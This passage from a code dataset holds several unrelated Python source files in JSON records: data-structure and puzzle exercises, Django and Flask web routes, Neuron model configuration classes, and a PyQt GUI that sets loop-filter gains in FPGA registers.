self.values[i])\n\n # O(n)\n def insere(self, valor):\n if self.last_position == self.capacity - 1:\n print('Capacidade máxima atingida')\n return\n\n posicao = 0\n for i in range(self.last_position + 1):\n posicao = i\n if self.values[i] > valor:\n break\n if i == self.last_position:\n posicao = i + 1\n\n x = self.last_position\n while x >= posicao:\n self.values[x + 1] = self.values[x]\n x -= 1\n\n self.values[posicao] = valor\n self.last_position += 1\n\n # O(n)\n def pesquisa_linear(self, valor):\n for i in range(self.last_position + 1):\n if self.values[i] > valor:\n return -1\n if self.values[i] == valor:\n return i\n if i == self.last_position:\n return -1\n\n # O(log n)\n def pesquisa_binaria(self, valor):\n limite_inferior = 0\n limite_superior = self.last_position\n\n while True:\n posicao_atual = int((limite_inferior + limite_superior) / 2)\n # Se achou na primeira tentativa\n if self.values[posicao_atual] == valor:\n return posicao_atual\n # Se não achou\n elif limite_inferior > limite_superior:\n return -1\n # Divide os limites\n else:\n # Limite inferior\n if self.values[posicao_atual] < valor:\n limite_inferior = posicao_atual + 1\n # Limite superior\n else:\n limite_superior = posicao_atual - 1\n\n # O(n)\n def excluir(self, valor):\n posicao = self.pesquisa_linear(valor)\n if posicao == -1:\n return -1\n else:\n for i in range(posicao, self.last_position):\n self.values[i] = self.values[i + 1]\n\n self.last_position -= 1\n\n\nvetor = 
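OrderedVector below reimplements sorted insertion and binary search by hand; the standard library's bisect module provides the same primitives (a sketch for comparison, not a drop-in replacement for the exercise):

    import bisect

    values = []
    for v in (6, 4, 3, 5, 1, 8):
        bisect.insort(values, v)       # keeps the list sorted on each insert

    i = bisect.bisect_left(values, 5)  # O(log n) binary search
    assert i < len(values) and values[i] == 5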
OrderedVector(10)\nvetor.imprime()\n\nvetor.insere(6)\nvetor.imprime()\n\nvetor.insere(4)\nvetor.imprime()\n\nvetor.insere(3)\nvetor.imprime()\n\nvetor.insere(5)\nvetor.imprime()\n\nvetor.insere(1)\nvetor.imprime()\n\nvetor.insere(8)\nvetor.imprime()\n\nvetor.pesquisa_linear(3)\n\nvetor.pesquisa_linear(2)\n\nvetor.pesquisa_linear(9)\n\nvetor.imprime()\n\nvetor.excluir(5)\nvetor.imprime()\n\nvetor.excluir(1)\nvetor.imprime()\n\nvetor.excluir(8)\nvetor.imprime()\n\nvetor.excluir(9)\n\nvetor = OrderedVector(10)\nvetor.insere(8)\nvetor.insere(9)\nvetor.insere(4)\nvetor.insere(1)\nvetor.insere(5)\nvetor.insere(7)\nvetor.insere(11)\nvetor.insere(13)\nvetor.insere(2)\nvetor.imprime()\n\nvetor.pesquisa_binaria(7)\n\nvetor.pesquisa_binaria(5)\n\nvetor.pesquisa_binaria(13)\n\nvetor.pesquisa_binaria(20)","repo_name":"glauberss2007/AI-overview","sub_path":"search_algotithms/ordered-vector/orderedVector.py","file_name":"orderedVector.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8475302870","text":"#!/usr/bin/env python3\n\nfloor = 0\nfor line in open('input.txt'):\n for i, x in enumerate(line):\n if x == '(':\n floor += 1\n elif x == ')':\n floor -=1\n if floor == -1:\n print(i + 1)\n break\n\n","repo_name":"tetrismegistus/minutia","sub_path":"exercises/guided_tutorials/advent15/1_2.py","file_name":"1_2.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"3"} +{"seq_id":"17902811532","text":"from django.urls import path, re_path, include\nfrom main.views import (\nhome,\npostUrlForm,\nfinalLogic\n)\nurlpatterns = [\n\t\t# path(r'', landing, name=\"landing\"),\n\t\tpath(r'', home, name=\"landing\"),\n\t\tpath('post/urlform/', postUrlForm, name ='url_form_submit'),\n\t\tpath(r'page/.pdf/', finalLogic, name=\"pdf\")\n\t\t]\n\n","repo_name":"PiusLucky/html_pdf","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19667817376","text":"# logic: we need to keep track of all projects we can complete using curr 'w'.\n# for this we will maintain a minHeap.\n# And from the all possible projects we have to take the most profitable project, so we will maintain a maxHeap for this.\n# Ele that we will pop from MaxHeap will be our ans.\n\n# time: O(k* 2*logn), space= O(n)\nclass Solution:\n def findMaximizedCapital(self, k: int, w: int, profits: List[int], capital: List[int]) -> int:\n maxProfit= [] # stores the profit of projects we can afford with current 'w'. creating maxHeap to get the maxProfit project \n minCapital= [(c, p) for c, p in zip(capital, profits)] # creating minHeap for pair (c, p)\n heapq.heapify(minCapital)\n print(minCapital)\n\n for i in range(k):\n # maxProfit= [] # creating here giving wrong ans. # Reason: we can get high profit project from the already added projects in 'maxProfit' \n # But we are adding from scratch for each project.\n\n # add all the profits of projects that we can afford into maxProfit with current capital 'w'. \n while minCapital and minCapital[0][0] <= w:\n c, p= heapq.heappop(minCapital)\n heapq.heappush(maxProfit, -1* p)\n # check if maxProfit is empty. 
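The IPO solution here pairs a min-heap keyed on capital with a max-heap keyed on profit; since heapq only provides a min-heap, the max-heap is simulated by negating values. The trick in isolation:

    import heapq

    profits = [5, 1, 9, 3]
    max_heap = [-p for p in profits]  # negate to simulate a max-heap
    heapq.heapify(max_heap)
    best = -heapq.heappop(max_heap)   # 9: most profitable first
    assert best == 9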
if empty means we can't add any project so simply break or return\n if not maxProfit:\n return w\n # Add the maxProfit project that we can afford with 'w'.\n w+= -1* heapq.heappop(maxProfit)\n return w\n","repo_name":"Ravi-0412/DSA-Program-And-Notes","sub_path":"Heap/502. IPO.py","file_name":"502. IPO.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"} +{"seq_id":"33007828651","text":"from flask import Flask, jsonify, abort, make_response, request\nfrom flask_mongoengine import MongoEngine\nfrom bson.json_util import dumps\nfrom helper import convert_artical_to_dict, convert_items_to_list\nimport subprocess\n\napp = Flask(__name__)\napp.config[\"MONGODB_SETTINGS\"] = {'DB': \"arsenal\"}\napp.config[\"SECRET_KEY\"] = \"KeepThisS3cr3t\"\n\nPAGE_SIZE = 30\ndb = MongoEngine(app)\n\n\n@app.route(\"/\")\ndef index():\n return \"This is for Arsenal Fans!!!\"\n\n\n@app.route(\"/arsenal/item/\")\n@app.route(\"/arsenal/item//\")\ndef item(page=0):\n from models import Item\n start = page * PAGE_SIZE\n end = (page + 1) * PAGE_SIZE\n articals = convert_items_to_list(Item.objects.order_by('-artical_id')[\n start:end])\n return dumps(articals)\n\n\n@app.route(\"/arsenal/article//\", methods=['GET'])\ndef artical(id):\n from models import Artical\n artical = Artical.objects(artical_id=id).get()\n return dumps(convert_artical_to_dict(artical, False))\n\n\n@app.route(\"/arsenal/article//\", methods=['POST'])\ndef article_with_user(article_id):\n if not request.json:\n abort(400)\n if not 'user_id' in request.json:\n abort(400)\n user_id = request.json['user_id']\n from models import Artical, Favorite\n article = Artical.objects(artical_id=article_id).get()\n obj = Favorite.objects(user_id=user_id)\n if obj:\n favorite = obj.get()\n article_list = favorite.article_list\n if article_id in article_list:\n return dumps(convert_artical_to_dict(article, True))\n return dumps(convert_artical_to_dict(article, False))\n\n\n@app.route(\"/arsenal/favorites/\", methods=['POST'])\ndef post_favorite():\n if not request.json or not 'user_id' in request.json or not 'article_id' in request.json:\n abort(400)\n user_id = request.json['user_id']\n article_id = request.json['article_id']\n from models import Favorite\n obj = Favorite.objects(user_id=user_id)\n if obj:\n favorite = obj.get()\n else:\n favorite = Favorite(user_id=user_id)\n favorite.article_list.append(article_id)\n favorite.article_list.sort(reverse=True)\n favorite.save()\n return jsonify({\"response_msg\": \"success\", \"response_code\": 201}), 201\n\n\n@app.route(\"/arsenal/favorites//\", methods=['GET'])\ndef get_favorite(id):\n from models import Favorite, Item\n favorite_items = []\n obj = Favorite.objects(user_id=id)\n if obj:\n favorite = obj.get()\n for article_id in favorite.article_list:\n item = Item.objects(artical_id=article_id).get()\n favorite_items.append(item)\n return dumps(convert_items_to_list(favorite_items))\n\n\n@app.route(\"/arsenal/favorites///\",\n methods=['DELETE'])\ndef del_favorite(user_id, article_id):\n from models import Favorite\n obj = Favorite.objects(user_id=user_id)\n if obj:\n favorite = obj.get()\n if article_id in favorite.article_list:\n obj.update_one(pull__article_list=article_id)\n return jsonify({\"response_msg\": \"success\",\n \"response_code\": 200}), 200\n return jsonify({\"response_msg\": \"Not Found\", \"response_code\": 404}), 404\n\n\n@app.errorhandler(404)\ndef not_found(error):\n return make_response(\n 
jsonify({'response_msg': 'Not Found',\n 'response_code': 404}), 404)\n\n\n@app.errorhandler(400)\ndef error_request(error):\n return make_response(\n jsonify({'response_msg': 'Bad Request',\n 'response_code': 400}), 400)\n\n\n@app.route(\"/arsenal/spider/\")\ndef spider():\n rc = subprocess.call(\"bash application/spider.sh\", shell=True)\n return str(rc)\n","repo_name":"lichuan0217/arsenal-server","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34640400328","text":"import math\n\nfrom transformers_neuronx.utils import build_dense_mask, create_blk_mask\n\nclass QuantizationConfig:\n \"\"\" The config class that contains all quantization related settings \"\"\"\n\n def __init__(self, quant_dtype='s8', dequant_dtype='f16', quantize_method='vector_dynamic',\n quantize_attn=True):\n QUANT_DTYPE_LIST = ['s8',]\n QUANTIZE_METHOD_LIST = ['vector_dynamic',]\n\n # The data type that the parameter is quantized into\n self.quant_dtype = quant_dtype\n if self.quant_dtype not in QUANT_DTYPE_LIST:\n raise NotImplementedError(f\"{self.quant_dtype} is not implemented. \\\n Available options are {','.join(QUANT_DTYPE_LIST)}\")\n\n # The data type that is dequantized to\n self.dequant_dtype = dequant_dtype\n\n # Which quantization algorithm to use\n self.quantize_method = quantize_method\n if self.quantize_method not in QUANTIZE_METHOD_LIST:\n raise NotImplementedError(f\"{self.quantize_method} is not implemented. \\\n Available options are {','.join(QUANTIZE_METHOD_LIST)}\")\n\n # Decide whether the attention layer needs be quantized\n self.quantize_attn = quantize_attn\n\nclass SparseAttnConfig:\n \"\"\" The config class that contains sparse attention related settings \"\"\"\n def __init__(self, attn_type='blk_sparse', causal=False,\n # blk-sparse configs\n blk_size=128,\n num_global_blks=0, num_local_blks=1, num_random_blks=0,\n # User can directly provide the masks if needed\n # Must provide a dict mapping from seq_len --> mask\n sparse_mask_dict=None, active_sparse_mask_dict=None):\n ATTN_TYPE_LIST = ['blk_sparse', 'custom']\n\n assert attn_type in ATTN_TYPE_LIST, f'Supported attention types are: {ATTN_TYPE_LIST}'\n if attn_type == 'blk_sparse':\n self.blk_size = blk_size\n self.num_global_blks = num_global_blks\n self.num_local_blks = num_local_blks\n self.num_random_blks = num_random_blks\n self.sparse_mask_dict = {}\n self.active_sparse_mask_dict = {}\n else:\n self.sparse_mask_dict = sparse_mask_dict\n self.active_sparse_mask_dict = active_sparse_mask_dict\n self.attn_type = attn_type\n self.causal = causal\n\n def create_sparse_mask(self, q_seq_len, kv_seq_len):\n \"\"\" Create a mask that defines how the new tokens attend to the old tokens \"\"\"\n assert ((q_seq_len == 1) or (q_seq_len == kv_seq_len)), \\\n \"Only supporting decode mode (q_seq_len=1) or self-attention mode (q_seq_len=k_seq_len)!\"\n key = (q_seq_len, kv_seq_len)\n if self.attn_type == 'custom':\n return self.sparse_mask_dict[key]\n\n # If using blk-sparse, search a cache first\n if key in self.sparse_mask_dict:\n return self.sparse_mask_dict[key]\n # If not found, generate it\n blks_q = math.ceil(q_seq_len / self.blk_size)\n blks_kv = math.ceil(kv_seq_len / self.blk_size)\n blk_mask = create_blk_mask(\n blks_q, blks_kv,\n self.num_global_blks,\n self.num_local_blks,\n self.num_random_blks,\n self.causal and (q_seq_len != 1)\n )\n dense_mask = build_dense_mask(\n 
q_seq_len, kv_seq_len,\n blk_mask, self.blk_size,\n self.causal and (q_seq_len != 1)\n )\n self.sparse_mask_dict[key] = dense_mask\n return dense_mask.detach()\n\n def create_active_sparse_mask(self, n_active_tokens):\n \"\"\" Create a mask that defines how the new tokens attend to each other \"\"\"\n if self.attn_type == 'custom':\n return self.active_sparse_mask_dict[n_active_tokens]\n\n # Same as above, except that we have q_seq_len = 1 now\n if n_active_tokens in self.active_sparse_mask_dict:\n return self.active_sparse_mask_dict[n_active_tokens]\n # If not found, generate it\n blks_q = 1\n blks_kv = math.ceil(n_active_tokens / self.blk_size)\n blk_mask = create_blk_mask(\n blks_q, blks_kv,\n self.num_global_blks,\n self.num_local_blks,\n self.num_random_blks,\n False # causal\n )\n dense_mask = build_dense_mask(\n 1, n_active_tokens,\n blk_mask, self.blk_size,\n False # causal\n )\n self.active_sparse_mask_dict[n_active_tokens] = dense_mask\n return dense_mask.detach()\n\n\nclass NeuronConfig():\n \"\"\" The class contains all Neuron related configs \"\"\"\n def __init__(self, **kargs):\n # Quantization related configurations\n self.quant = kargs.pop('quant', None)\n # Sparse attention related configurations\n self.sparse_attn = kargs.pop('sparse_attn', None)\n\nclass GenerationConfig:\n\n def __init__(self, *,\n max_length = None, # Default: Infer max sequence length from model\n do_sample = False, # Default: Greedy\n top_k = 50, # Default: Top 50 (when sampling)\n eos_token_id = None, # Default: Ignore EOS token\n early_stopping = None, # Default: Open-ended generation\n temperature = None, # Default: No temperature application\n ):\n self.max_length = max_length\n self.do_sample = do_sample\n self.top_k = top_k\n self.eos_token_id = eos_token_id\n self.early_stopping = early_stopping\n self.temperature = temperature\n\n","repo_name":"aws-neuron/transformers-neuronx","sub_path":"src/transformers_neuronx/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5619,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"3"} +{"seq_id":"70140113363","text":"import sys\r\n\r\nfrom PyQt4 import QtCore, Qt, QtGui, uic, Qwt5\r\nimport pyqtgraph\r\nimport numpy\r\n\r\nfrom ControlWidget import ControlWidget\r\n\r\nimport time\r\n \r\nclass LoopFilterWidget(ControlWidget):\r\n def __init__(self, parent, dev):\r\n super(LoopFilterWidget, self).__init__(parent)\r\n uic.loadUi(\"LoopFilterWidget.ui\", self)\r\n self.dev = dev\r\n self.parent = parent\r\n\r\n self.REG_ADDR_CLR = 0x00080\r\n self.REG_ADDR_LOCK = 0x00084\r\n self.REG_ADDR_COEF_D_FILT = 0x00088\r\n self.REG_ADDR_CMD_IN_D = 0x0008C\r\n self.REG_ADDR_CMD_IN_P = 0x00090\r\n self.REG_ADDR_CMD_IN_I = 0x00094\r\n self.REG_ADDR_CMD_IN_II = 0x00098\r\n self.REG_ADDR_DITHER_EN = 0x0009C\r\n self.REG_ADDR_DITHER_AMPLI = 0x000A0\r\n self.REG_ADDR_DITHER_PERIOD = 0x000A4\r\n\r\n self.REG_ADDR_BRANCH_EN_D = 0x000A8\r\n self.REG_ADDR_BRANCH_EN_P = 0x000AC\r\n self.REG_ADDR_BRANCH_EN_I = 0x000B0\r\n self.REG_ADDR_BRANCH_EN_II = 0x000B4\r\n\r\n self.FS = 125.0e6\r\n\r\n self.curve1 = Qwt5.QwtPlotCurve(\"Asymptotes\")\r\n self.curve1.setPen(Qt.QColor(0, 64, 0))\r\n self.curve1.attach(self.graph)\r\n self.curve1.setData([], [])\r\n\r\n self.curve2 = Qwt5.QwtPlotCurve(\"Actual magnitude\")\r\n self.curve2.setPen(Qt.QColor(0, 255, 0))\r\n self.curve2.attach(self.graph)\r\n self.curve2.setData([], [])\r\n\r\n self.curve3 = Qwt5.QwtPlotCurve(\"Actual phase\")\r\n self.curve3.setPen(Qt.QColor(255, 0, 
255))\r\n self.curve3.attach(self.graph)\r\n self.curve3.setYAxis(Qwt5.QwtPlot.yRight)\r\n self.curve3.setData([], [])\r\n\r\n self.grid = Qwt5.QwtPlotGrid()\r\n self.grid.attach(self.graph)\r\n\r\n self.graph.replot()\r\n self.graph.setAxisTitle(Qwt5.QwtPlot.xBottom, \"Frequency [Hz]\")\r\n self.graph.setAxisScaleEngine(Qwt5.QwtPlot.xBottom, Qwt5.QwtLog10ScaleEngine())\r\n #self.graph.setAxisScale(Qwt5.QwtPlot.xBottom, 1e3, 1e6)\r\n self.graph.enableAxis(Qwt5.QwtPlot.yRight)\r\n self.graph.setAxisTitle(Qwt5.QwtPlot.yRight, \"Phase [degrees]\")\r\n #self.graph.setAxisScale(Qwt5.QwtPlot.yRight, -1080, 1e2)\r\n\r\n self.graph.setAxisTitle(Qwt5.QwtPlot.yLeft, \"Magnitude [V/rad]\")\r\n self.graph.setAxisScaleEngine(Qwt5.QwtPlot.yLeft, Qwt5.QwtLog10ScaleEngine())\r\n #self.graph.setAxisScale(Qwt5.QwtPlot.yLeft, 1e-6, 1e2)\r\n self.graph.setCanvasBackground(Qt.QColor(32,32,32))\r\n \r\n # timerPeriod_secs = 0.03\r\n\r\n # self.timer = QtCore.QTimer(self)\r\n # self.timer.timeout.connect(self.update)\r\n # self.timer.start(round(1000*timerPeriod_secs))\r\n\r\n self.checkLockEnabled.clicked.connect(self.checkLockEnabled_clicked)\r\n self.buttonClearIntegrators.clicked.connect(self.buttonClearIntegrators_clicked)\r\n\r\n self.checkBranchEnabledD.clicked.connect(self.checkBranchEnabledP_clicked)\r\n self.checkBranchEnabledP.clicked.connect(self.checkBranchEnabledP_clicked)\r\n self.checkBranchEnabledI.clicked.connect(self.checkBranchEnabledI_clicked)\r\n self.checkBranchEnabledII.clicked.connect(self.checkBranchEnabledII_clicked)\r\n\r\n self.checkDitherEnabled.clicked.connect(self.checkDitherEnabled_clicked)\r\n\r\n self.editDitherPeriod.editingFinished.connect(self.editDitherPeriod_editingFinished)\r\n self.editDitherAmpli.editingFinished.connect(self.editDitherAmpli_editingFinished)\r\n\r\n self.editGainFD.editingFinished.connect(self.editGainFD_editingFinished)\r\n self.editGainD.editingFinished.connect(self.editGainD_editingFinished)\r\n self.editGainP.editingFinished.connect(self.editGainP_editingFinished)\r\n self.editGainI.editingFinished.connect(self.editGainI_editingFinished)\r\n self.editGainII.editingFinished.connect(self.editGainII_editingFinished)\r\n\r\n self.checkFlipPlotSign.clicked.connect(self.update_transfer_function)\r\n \r\n def update(self):\r\n pass\r\n\r\n def update_transfer_function(self):\r\n\r\n\r\n freq_axis = numpy.logspace(-2,8, num=1000, endpoint=False);\r\n wn = 2*numpy.pi*freq_axis/self.FS\r\n\r\n zrec = numpy.exp(-1j*wn)\r\n\r\n bFlipSign = self.checkFlipPlotSign.isChecked()\r\n\r\n try:\r\n cn = float(self.editGainFD.text()) / float(2**24)\r\n Kd = 0.0\r\n Kp = 0.0\r\n Ki = 0.0\r\n Kii = 0.0\r\n if self.checkBranchEnabledD.isChecked():\r\n Kd = float(self.editGainD.text())\r\n if self.checkBranchEnabledP.isChecked():\r\n Kp = float(self.editGainP.text())\r\n if self.checkBranchEnabledI.isChecked():\r\n Ki = float(self.editGainI.text())\r\n if self.checkBranchEnabledII.isChecked():\r\n Kii = float(self.editGainII.text())\r\n except ValueError:\r\n print(\"Bad value\")\r\n pass\r\n\r\n asympt_DF = numpy.absolute(Kd*cn)*numpy.ones(wn.shape)\r\n asympt_D = numpy.absolute(Kd)*numpy.absolute(wn)\r\n asympt_P = numpy.absolute(Kp)*numpy.ones(wn.shape)\r\n asympt_I = numpy.absolute(Ki)/numpy.absolute(wn)\r\n asympt_II = numpy.absolute(Kii)/(numpy.absolute(wn)**2)\r\n\r\n asympt = numpy.minimum(asympt_DF, asympt_D)\r\n asympt = numpy.maximum(asympt, asympt_P)\r\n asympt = numpy.maximum(asympt, asympt_I)\r\n asympt = numpy.maximum(asympt, asympt_II)\r\n\r\n actual_d = 
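update_transfer_function below evaluates the discrete-time branch responses on the unit circle, z = exp(-j*2*pi*f/fs). A stripped-down sketch for a plain PI response; the gains and frequency span here are illustrative, not the widget's defaults:

    import numpy as np

    fs = 125e6
    freq = np.logspace(1, 7, 500)            # 10 Hz .. 10 MHz
    z = np.exp(-1j * 2 * np.pi * freq / fs)  # unit-circle evaluation points

    kp, ki = 1e-2, 1e-5
    h = kp + ki * z / (1 - z)                # P branch plus discrete integrator
    mag = np.abs(h)
    phase_deg = np.degrees(np.angle(h))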
Kd*(zrec**4)*(1-zrec)*cn/(1+(-1+cn)*zrec)\r\n        actual_p = Kp*(zrec**3)\r\n        actual_i = Ki*(zrec**8)*zrec/(1-zrec)\r\n        actual_ii= Kii*(zrec**12)*(zrec/(1-zrec))**2\r\n\r\n        pid_scaling = (1048576.0/(2.0*numpy.pi*65536/2.0))\r\n\r\n        asympt = asympt * pid_scaling\r\n\r\n        actual_function = (actual_d + actual_p + actual_i + actual_ii)*pid_scaling\r\n        if bFlipSign:\r\n            actual_function = -actual_function\r\n\r\n        magn = numpy.absolute(actual_function)\r\n        rangle = (360.0/(2.0*numpy.pi))*numpy.angle(actual_function)\r\n\r\n        log_magn = 10.0*numpy.log10(magn)\r\n        log_asympt = 10.0*numpy.log10(asympt)\r\n\r\n        self.curve1.setData(freq_axis, asympt)\r\n        self.curve2.setData(freq_axis, magn)\r\n        self.curve3.setData(freq_axis, rangle)\r\n        #self.graph.setAxisScale(Qwt5.QwtPlot.yLeft, numpy.amin(log_magn), numpy.amax(log_magn))\r\n        self.graph.replot()\r\n\r\n        scaling_to_hertz = float(self.FS)/(2.0*numpy.pi)\r\n        strInfo = \"\"\r\n        if Kd != 0.0:\r\n            strInfo += \"D-P crossing : %g Hz\\n\" % float(scaling_to_hertz*numpy.absolute(Kp/Kd))\r\n            strInfo += \"D cutoff : %g Hz\\n\" % float(scaling_to_hertz*numpy.absolute(cn))\r\n        if Kp != 0.0:\r\n            strInfo += \"P-I crossing : %g Hz\\n\" % float(scaling_to_hertz*numpy.absolute(Ki/Kp))\r\n            strInfo += \"P-II crossing : %g Hz\\n\" % float(scaling_to_hertz*numpy.sqrt(numpy.absolute(Kii/Kp)))\r\n        if Ki != 0.0:\r\n            strInfo += \"II-I crossing : %g Hz\\n\" % float(scaling_to_hertz*numpy.absolute(Kii/Ki))\r\n\r\n\r\n        self.textInfo.setPlainText(strInfo)\r\n\r\n\r\n    \r\n    def float_to_hdr_gain_code(self, gain, max_shifts=None):\r\n        MAX_SHIFTERS = 6\r\n        if max_shifts is None:\r\n            max_shifts = MAX_SHIFTERS\r\n        if max_shifts > MAX_SHIFTERS:\r\n            raise ValueError(\"Unsupported number of shifters\")\r\n        \r\n        if gain == 0.0:\r\n            return (0, 0.0)\r\n        \r\n        MINIMUM_GAIN = (2.0**-16.0)\r\n        MAXIMUM_GAIN = (2.0**8.0)\r\n\r\n        curr_mant = gain;\r\n        \r\n        n_right_shifts = 0\r\n        while (abs(curr_mant) < MINIMUM_GAIN or n_right_shifts < max_shifts) and (abs(curr_mant)*256.0 <= MAXIMUM_GAIN):\r\n            n_right_shifts += 1\r\n            curr_mant *= 256.0\r\n        \r\n        n_left_shifts = 0\r\n        while (abs(curr_mant) > MAXIMUM_GAIN):\r\n            n_left_shifts += 1\r\n            curr_mant /= 256.0\r\n        \r\n        gain_mant = round((2.0**16.0)*curr_mant)\r\n        \r\n        actual_gain = (2.0**-16.0) * gain_mant * 256.0**(n_left_shifts-n_right_shifts)\r\n        \r\n        if n_right_shifts and n_left_shifts:\r\n            raise Exception(\"Both right shifts and left shifts\")\r\n        \r\n        code = 0x80000000\r\n        if n_right_shifts != 0 and n_left_shifts == 0:\r\n            code = 0x00000000\r\n\r\n        n_shifts = n_right_shifts+n_left_shifts \r\n        \r\n        shift_codes = [0x00000000, 0x02000000, 0x06000000, 0x0E000000, 0x1E000000, 0x3E000000, 0x7E000000]\r\n        code |= shift_codes[int(n_shifts)]\r\n\r\n        mant_mask = 0x01FFFFFF\r\n        code |= (int(gain_mant) & mant_mask)\r\n        \r\n        return (code, actual_gain)\r\n\r\n    \r\n    \r\n#    def float_to_hdr_gain_code(self, gain, max_shifts=None):\r\n#        MAX_SHIFTERS = 6\r\n#        if max_shifts is None:\r\n#            max_shifts = MAX_SHIFTERS\r\n#        if max_shifts > MAX_SHIFTERS:\r\n#            ValueError(\"Unsupported number of shifters\")\r\n#        \r\n#        if gain == 0.0:\r\n#            return (0, 0.0)\r\n#\r\n#        log256_gain = numpy.log(numpy.abs(gain))/numpy.log(256.0)\r\n#        log256_sign = numpy.sign(log256_gain)\r\n#        n_shifts = numpy.floor(numpy.abs(log256_gain))\r\n#        gain_mant = numpy.round((2.0**16.0)* gain * 256.0**(-log256_sign*n_shifts))\r\n#\r\n#        if n_shifts > max_shifts:\r\n#            n_shifts = max_shifts\r\n#\r\n#        actual_gain = (2.0**-16.0) * gain_mant * 256.0**(log256_sign*n_shifts)\r\n#\r\n#        code = 0x80000000\r\n#        if int(log256_sign) == 
-1:\r\n# code = 0x00000000\r\n#\r\n# shift_codes = [0x00000000, 0x02000000, 0x06000000, 0x0E000000, 0x1E000000, 0x3E000000, 0x7E000000]\r\n# code |= shift_codes[int(n_shifts)]\r\n#\r\n# mant_mask = 0x01FFFFFF\r\n# code |= (int(gain_mant) & mant_mask)\r\n#\r\n# return (code, actual_gain)\r\n\r\n def hdr_gain_code_to_float(self, code):\r\n log256_sign = -1.0\r\n if (int(code) & 0x80000000):\r\n log256_sign = 1.0\r\n\r\n n_shifts = 0.0\r\n\r\n if (int(code) & 0x40000000):\r\n n_shifts += 1.0\r\n if (int(code) & 0x20000000):\r\n n_shifts += 1.0\r\n if (int(code) & 0x10000000):\r\n n_shifts += 1.0\r\n if (int(code) & 0x08000000):\r\n n_shifts += 1.0\r\n if (int(code) & 0x04000000):\r\n n_shifts += 1.0\r\n if (int(code) & 0x02000000):\r\n n_shifts += 1.0\r\n\r\n mant_mask = 0x01FFFFFF\r\n gain_mant = int(code) & mant_mask\r\n if (gain_mant & 0x01000000):\r\n gain_mant = gain_mant - 0x02000000\r\n\r\n actual_gain = (2.0**-16.0) * gain_mant * 256.0**(log256_sign*n_shifts)\r\n\r\n return actual_gain\r\n\r\n def update_content(self):\r\n\r\n self.checkBranchEnabledD.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_D)))\r\n self.checkBranchEnabledP.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_P)))\r\n self.checkBranchEnabledI.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_I)))\r\n self.checkBranchEnabledII.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_II)))\r\n\r\n self.checkLockEnabled.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_LOCK)))\r\n self.buttonClearIntegrators.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_CLR)))\r\n\r\n self.checkDitherEnabled.setChecked(bool(self.dev.read_Zynq_register_uint32(self.REG_ADDR_DITHER_EN)))\r\n\r\n self.editDitherPeriod.setText(str(self.dev.read_Zynq_register_uint32(self.REG_ADDR_DITHER_PERIOD)))\r\n self.editDitherAmpli.setText(str(self.dev.read_Zynq_register_uint32(self.REG_ADDR_DITHER_AMPLI)))\r\n\r\n self.editGainFD.setText(str(self.dev.read_Zynq_register_int32(self.REG_ADDR_COEF_D_FILT)))\r\n self.editGainD.setText( \"%.16f\"%(self.hdr_gain_code_to_float(self.dev.read_Zynq_register_uint32(self.REG_ADDR_CMD_IN_D))))\r\n self.editGainP.setText( \"%.16f\"%(self.hdr_gain_code_to_float(self.dev.read_Zynq_register_uint32(self.REG_ADDR_CMD_IN_P))))\r\n self.editGainI.setText( \"%.16f\"%(self.hdr_gain_code_to_float(self.dev.read_Zynq_register_uint32(self.REG_ADDR_CMD_IN_I))))\r\n self.editGainII.setText(\"%.16f\"%(self.hdr_gain_code_to_float(self.dev.read_Zynq_register_uint32(self.REG_ADDR_CMD_IN_II))))\r\n \r\n self.update_transfer_function()\r\n\r\n def checkBranchEnabledD_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_D , int(self.checkBranchEnabledD.isChecked()))\r\n self.update_transfer_function()\r\n def checkBranchEnabledP_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_P , int(self.checkBranchEnabledP.isChecked()))\r\n self.update_transfer_function()\r\n def checkBranchEnabledI_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_I , int(self.checkBranchEnabledI.isChecked()))\r\n self.update_transfer_function()\r\n def checkBranchEnabledII_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_BRANCH_EN_II , int(self.checkBranchEnabledII.isChecked()))\r\n self.update_transfer_function()\r\n\r\n def checkDitherEnabled_clicked(self):\r\n self.dev.write_Zynq_register_uint32(self.REG_ADDR_DITHER_EN, 
